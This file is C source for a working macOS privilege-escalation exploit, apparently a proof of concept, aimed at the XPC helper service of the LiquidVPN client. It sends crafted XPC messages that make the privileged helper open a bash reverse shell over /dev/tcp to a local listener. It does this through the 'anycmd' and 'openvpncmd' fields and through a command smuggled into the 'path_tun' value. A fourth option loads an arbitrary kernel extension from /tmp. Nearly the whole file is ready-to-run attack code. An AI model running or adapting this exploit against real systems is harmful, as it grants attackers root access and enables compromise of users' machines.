// start netcat listener on port 9999

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <xpc/xpc.h>

void what(const char *bin) {
    printf("%s <1-4>\n", bin);
    printf("[1] Privesc (local reverse shell on port 9999 via \"anycmd\")\n");
    printf("[2] Privesc (local reverse shell on port 9999 via \"openvpncmd\")\n");
    printf("[3] Privesc (local reverse shell on port 9999 via OS command injection)\n");
    printf("[4] KEXT (load arbitrary kernel extension from /tmp/tun.kext (has to be signed for MacOS >= 10.13))\n");
}
 
int main(int argc, const char *argv[]) {

    if (argc == 1 || argc > 2) {
        what(argv[0]);
        return 0;
    }

    int option = atoi(argv[1]);
    xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);

    switch(option) {
        case 1:
            // "anycmd"
            xpc_dictionary_set_string(message, "cmd", "anycmd");
            xpc_dictionary_set_bool(message, "blocking", FALSE);
            xpc_dictionary_set_string(message, "command_line", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
            break;
        case 2:
            // "openvpncmd"
            xpc_dictionary_set_string(message, "cmd", "openvpn");
            xpc_dictionary_set_string(message, "openvpncmd", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
            break;
        case 3:
            // cmd injection via "path_tun". "path_tap" is affected by the same bug
            mkdir("/tmp/__dummy00_", 0755);
            xpc_dictionary_set_string(message, "cmd", "openvpn");
            xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;bash -i >& /dev/tcp/127.0.0.1/9999 0>&1;cat");
            rmdir("/tmp/__dummy00_");
            break;
        case 4:
            // load arbitrary kext via "path_tun". "path_tap" is affected by the same bug
            xpc_dictionary_set_string(message, "cmd", "openvpn");
            xpc_dictionary_set_string(message, "path_tun", "/tmp/tun.kext");
            break;
        default:
            what(argv[0]);
            return 0;
    }

    printf("[+] sending xpc message.\n");

    xpc_connection_t connection = xpc_connection_create_mach_service("com.smr.liquidvpn.OVPNHelper", NULL, 0);
    if (connection == NULL) {
        printf("[-] connection to xpc service failed.\n");
        return 1;
    }

    xpc_connection_set_event_handler(connection, ^(xpc_object_t e) {
        // we don't need that here.
    });

    xpc_connection_resume(connection);

    printf("[+] check your listener.\n");
    xpc_object_t result = xpc_connection_send_message_with_reply_sync(connection, message);

    printf("[+] bye.\n");

    return 0;
}